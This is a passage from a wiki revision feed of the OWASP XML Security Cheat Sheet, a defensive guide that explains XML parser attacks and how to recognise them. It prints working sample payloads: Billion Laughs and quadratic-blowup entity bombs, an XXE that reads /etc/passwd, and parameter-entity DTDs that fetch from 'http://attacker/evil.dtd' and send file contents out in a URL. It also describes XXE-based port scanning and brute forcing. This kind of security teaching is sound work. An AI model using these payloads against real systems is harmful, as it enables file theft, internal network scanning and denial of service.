Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224419</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224419"/>
				<updated>2016-12-21T19:49:20Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
